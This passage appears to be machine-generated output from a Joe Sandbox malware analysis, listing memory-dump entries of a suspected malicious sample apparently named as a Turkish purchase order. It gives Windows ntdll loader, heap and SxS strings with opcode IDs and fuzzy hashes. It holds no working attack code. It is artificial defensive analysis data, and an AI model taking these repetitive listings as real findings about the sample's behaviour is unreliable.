                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                  • API String ID: 0-1356375266
                                                                  • Opcode ID: d2264b888c5bf0ee46877ec01365100760e0c25c8a08162e9f3879f2cfb701c5
                                                                  • Instruction ID: 8745781ad466b6d567e3039cebb0639088ede96ff5c3a27f0aa002853f5d7577
                                                                  • Opcode Fuzzy Hash: d2264b888c5bf0ee46877ec01365100760e0c25c8a08162e9f3879f2cfb701c5
                                                                  • Instruction Fuzzy Hash: 74A13CB19083459FE311CF25C484B9BB7E8BF88759F40892EE99896350DB74D948CFA3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-523794902
                                                                  • Opcode ID: fa18c2c7f30cf6ed17cd55eaa66e9f5ea98051b3fe3621add2922cd776961cfe
                                                                  • Instruction ID: 7b05b56620a930528ff0a506c309499dc6e1b9311f68dda278909b0c26e54e42
                                                                  • Opcode Fuzzy Hash: fa18c2c7f30cf6ed17cd55eaa66e9f5ea98051b3fe3621add2922cd776961cfe
                                                                  • Instruction Fuzzy Hash: F342BE752083819FE305CF28C880B2AB7E5FF89748F548969F895CB391DB74D945CBA2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                  • API String ID: 0-122214566
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-792281065
                                                                  Strings
                                                                  • Loading import redirection DLL: '%wZ', xrefs: 32DA8170
                                                                  • LdrpInitializeProcess, xrefs: 32D6C6C4
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 32DA8181, 32DA81F5
                                                                  • LdrpInitializeImportRedirection, xrefs: 32DA8177, 32DA81EB
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32D6C6C3
                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 32DA81E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 0-475462383
                                                                  Strings
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 32DA21BF
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 32DA2180
                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 32DA219F
                                                                  • RtlGetAssemblyStorageRoot, xrefs: 32DA2160, 32DA219A, 32DA21BA
                                                                  • SXS: %s() passed the empty activation context, xrefs: 32DA2165
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 32DA2178
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                  • API String ID: 0-861424205
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-4253913091
                                                                  APIs
                                                                  Strings
                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 32DA82DE
                                                                  • Failed to reallocate the system dirs string !, xrefs: 32DA82D7
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32DA82E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-1783798831
                                                                  APIs
                                                                  Strings
                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32DB4888
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 32DB4899
                                                                  • LdrpCheckRedirection, xrefs: 32DB488F
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 3446177414-3154609507
                                                                  Strings
                                                                  • WindowsExcludedProcs, xrefs: 32D5522A
                                                                  • Kernel-MUI-Language-Allowed, xrefs: 32D5527B
                                                                  • Kernel-MUI-Number-Allowed, xrefs: 32D55247
                                                                  • Kernel-MUI-Language-SKU, xrefs: 32D5542B
                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 32D55352
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                  • API String ID: 0-258546922
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                  • API String ID: 0-3061284088
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                  • API String ID: 0-3178619729
                                                                  APIs
                                                                  Strings
                                                                  • kLsE, xrefs: 32D30540
                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32D3063D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                  • API String ID: 3446177414-2547482624
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                  • API String ID: 0-379654539
                                                                  Strings
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 32DA22B6
                                                                  • SXS: %s() passed the empty activation context, xrefs: 32DA21DE
                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32DA21D9, 32DA22B1
                                                                  • .Local, xrefs: 32D628D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                  • API String ID: 0-1239276146
                                                                  • Opcode ID: 73ab6f6884f60c7b4c0a5398d285621150dd62e554b949dee00ac47b8c1ec182
                                                                  • Instruction ID: a7fc439c51b733e84fe35ef489085cf18bf00fa74709c5539f4f4d74e5b49942
                                                                  • Opcode Fuzzy Hash: 73ab6f6884f60c7b4c0a5398d285621150dd62e554b949dee00ac47b8c1ec182
                                                                  • Instruction Fuzzy Hash: 8EA1AE75941329DBEB24CF65DC88BA9B3B1BF58358F5041EAD848AB350DB349E80CF90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                  • API String ID: 0-2586055223
                                                                  • Opcode ID: cfbaef7d8c530bbf54b5ca86448d387f64106dd5ef76aed6596ce111a9a90816
                                                                  • Instruction ID: b774ddce40114d713f2c6b009dfdb1c4f5751027248d4e009314115bbca190ab
                                                                  • Opcode Fuzzy Hash: cfbaef7d8c530bbf54b5ca86448d387f64106dd5ef76aed6596ce111a9a90816
                                                                  • Instruction Fuzzy Hash: 3261E076204780AFE311CB28D844F5BB7E9FF84758F140869F9948B3A1DB74E945CBA2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                  • API String ID: 0-336120773
                                                                  • Opcode ID: 69455c4cd2dade254adf378beebeb5171b40c3480e5cf8af5472d4e4e1311854
                                                                  • Instruction ID: b73d2eb3c726134341c106a310e61e049852ff62d7256b91acb595c083ed4cc4
                                                                  • Opcode Fuzzy Hash: 69455c4cd2dade254adf378beebeb5171b40c3480e5cf8af5472d4e4e1311854
                                                                  • Instruction Fuzzy Hash: 76317C75200254EFE705CBA8CC86F5AB3E8FF49B68F508155E842DB3A0DA60ED84DE65
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                  • API String ID: 0-1391187441
                                                                  • Opcode ID: 725cb64e8d0e87e152bda3c92b0b201ed053bb05231784d6649858cef7b5b6a1
                                                                  • Instruction ID: 707a1fcf2ef57ec01a8c417c3b069a5de5a6ee48fc4313e2f98c975bd02bb46a
                                                                  • Opcode Fuzzy Hash: 725cb64e8d0e87e152bda3c92b0b201ed053bb05231784d6649858cef7b5b6a1
                                                                  • Instruction Fuzzy Hash: 95318F76A00254EFEB02CB55D884FDAB7B9EF45768F248055E825AB390DBB0ED44CE60
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 20e8fbcf6595d8c5990df693e5b0ac4383fdae7c1c600f88c17e02c4b1a5579a
                                                                  • Instruction ID: 8e4a0ed818c5e5862416e535f0abf4f153a9cf773fc513351870347c9ba75de9
                                                                  • Opcode Fuzzy Hash: 20e8fbcf6595d8c5990df693e5b0ac4383fdae7c1c600f88c17e02c4b1a5579a
                                                                  • Instruction Fuzzy Hash: 4051E176A01B06EFFB0ACF64C944BADB7B4BF04755F108169E95293390EBB09905CF90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                  • API String ID: 0-1145731471
                                                                  • Opcode ID: 6b3a41576444d8a7e6eed86d7cf04c243198d1c6a419f6f02de4e25500c2fca2
                                                                  • Instruction ID: 499364a4c72f94eb3eba2c05ed0c8c21e82d8a41bf7423d26fe7553062f892bc
                                                                  • Opcode Fuzzy Hash: 6b3a41576444d8a7e6eed86d7cf04c243198d1c6a419f6f02de4e25500c2fca2
                                                                  • Instruction Fuzzy Hash: 72B1ADB9A057449FDB16CF69C980B9DB7B2FF44358F144529E951EBB80DB70E840CB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                  • API String ID: 0-2391371766
                                                                  • Opcode ID: 99e258aef7374623606c33def192cf1d04bff9ea6446652127c7f257c344af47
                                                                  • Instruction ID: cb683b3bf28deebd1d3c3b7f8ae03a7abf35cbdb25f2550b3cdc1f2cb24308f7
                                                                  • Opcode Fuzzy Hash: 99e258aef7374623606c33def192cf1d04bff9ea6446652127c7f257c344af47
                                                                  • Instruction Fuzzy Hash: D3B122B5608381AFEB41DF54C8A0F5BB7E8EF45714F510929FA42A7750CBB0E844CB92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                  • API String ID: 0-2779062949
                                                                  • Opcode ID: 30bf697a41593cad1679dc4ae34f268b79b369da57fc3d619e36c814176d9195
                                                                  • Instruction ID: 3531b921e8bff339c35cf18769498b0b983d51c2af95276189d721c78bdbcfc1
                                                                  • Opcode Fuzzy Hash: 30bf697a41593cad1679dc4ae34f268b79b369da57fc3d619e36c814176d9195
                                                                  • Instruction Fuzzy Hash: AFA19B759012299BDB21DF68CC88BEAB7B8EF04704F5041EAE908A7350DB759EC5CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                  • API String ID: 0-318774311
                                                                  • Opcode ID: 9afa4e7f35fe59e6d58a5c66d1fe46043ec8c8a1ae53572b20ec334fde22eea8
                                                                  • Instruction ID: 2f5133cfb68002dd9cf412c469ef9c05edee3938849d4461c0549fcebd37b821
                                                                  • Opcode Fuzzy Hash: 9afa4e7f35fe59e6d58a5c66d1fe46043ec8c8a1ae53572b20ec334fde22eea8
                                                                  • Instruction Fuzzy Hash: 60817AB5608350AFE795CF18C884B6AB7E8FF89754F400929FD809BB90DB74D904CB62
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %$&$@
